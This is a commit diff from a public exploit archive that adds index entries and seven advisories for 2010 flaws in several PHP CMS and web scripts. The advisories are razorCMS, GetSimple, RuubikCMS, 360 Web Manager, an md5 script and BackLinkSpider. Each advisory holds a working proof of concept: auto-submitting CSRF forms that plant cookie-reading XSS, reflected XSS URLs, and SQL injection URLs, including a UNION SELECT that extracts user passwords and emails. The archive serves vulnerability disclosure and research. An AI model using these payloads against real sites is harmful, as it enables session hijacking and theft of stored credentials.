Updated 07_14_2014

files.csv

@@ -30653,3 +30653,10 @@ id,file,description,date,author,platform,type,port
 34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0
 34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
 34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
+34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
+34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
+34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
+34043,platforms/php/webapps/34043.txt,"360 Web Manager 3.0 'webpages-form-led-edit.php' SQL Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
+34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross Site Scripting Vulnerability",2010-05-26,indoushka,php,webapps,0
+34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 'cat_id' Parameter SQL Injection Vulnerability",2010-05-27,"sniper ip",php,webapps,0
+34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0

platforms/php/webapps/34040.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40373/info
+
+razorCMS is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+razorCMS 1.0 Stable is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/admin/?action=edit&slab=home" method="post" name="main" > <input type="hidden" name="title" value="Home" /> <input name="content" type="hidden" value='hello"><script>alert("2"+document.cookie)</script>' /> <input type="hidden" name="ptitle" value="" /> <input type="hidden" name="theme" value="theme-default" /> <input type="hidden" name="check_sidebar" value="sidebar" /> <input type="hidden" name="save" value="Save Content" /> </form> <script> document.main.submit(); </script> 

platforms/php/webapps/34041.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/40374/info
+
+GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+GetSimple CMS 2.01 is vulnerable; prior versions may also be affected.
+
+<form action="http://www.example.com/admin/components.php" method="post" name="main" accept-charset="utf-8" >
+	<input type="hidden" name="submitted" value="Save Components" />
+	<input name="val[]" type="hidden" value='Some text here..."><script>alert(document.cookie)</script>' />
+	<input type="hidden" name="slug[]" value="sidebar" />
+	<input type="hidden" name="title[]" value="Sidebar" />
+	<input type="hidden" name="id[]" value="0" />
+	<input type="hidden" name="val[]" value="Just Another GetSimple Website" />
+	<input type="hidden" name="slug[]" value="tagline" />
+	<input type="hidden" name="title[]" value="Tagline" />
+	<input type="hidden" name="id[]" value="1" />
+</form>
+<script>
+document.main.submit();
+</script>

platforms/php/webapps/34042.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40375/info
+
+RuubikCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+RuubikCMS 1.0.3 is vulnerable; other versions may also be affected. 
+
+<form action="http://example.com/ruubikcms/cms/index.php?p=home" method="post" name="main" > <input type="hidden" name="save" value="1" /> <input type="hidden" name="ordernum" value="1" /> <input type="hidden" name="name" value="Home" /> <input type="hidden" name="header1" value="Home" /> <input type="hidden" name="pageurl" value="home" /> <input type="hidden" name="pagelink" value="%2Findex.php%2Fhome" /> <input type="hidden" name="mother_hidden" value="" /> <input type="hidden" name="creator" value="admin" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="description" value='hello"><script>alert(document.cookie)</script>' /> <input type="hidden" name="keywords" value="" /> <input type="hidden" name="extracode" value="" /> <input type="hidden" name="picfile1" value="" /> <input type="hidden" name="picfile2" value="" /> <input type="hidden" name="tinyMCE" value="page content here..." /> </form> <script> document.main.submit(); </script>

platforms/php/webapps/34043.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40378/info
+
+360 Web Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+360 Web Manager 3.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/adm/content/webpages/webpages-form-led-edit.php?IDFM=-1+ANY_SQL_HERE+--+ 

platforms/php/webapps/34044.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40381/info
+
+md5 Encryption Decryption PHP Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/MD5/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt> 

platforms/php/webapps/34045.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40398/info
+
+BackLinkSpider is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://example.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb-- 

platforms/php/webapps/34046.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/40400/info
+
+BackLinkSpider is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+BackLinkSpider 1.3.1774.0 is vulnerable; other versions may also be affected. 
+
+
+http://www.example.com/links.php?cat_id=[XSS]
+http://www.example.com/links.php?siteid=[XSS]
+http://www.example.com/links.php?cat_id=1&cat_name=1[XSS]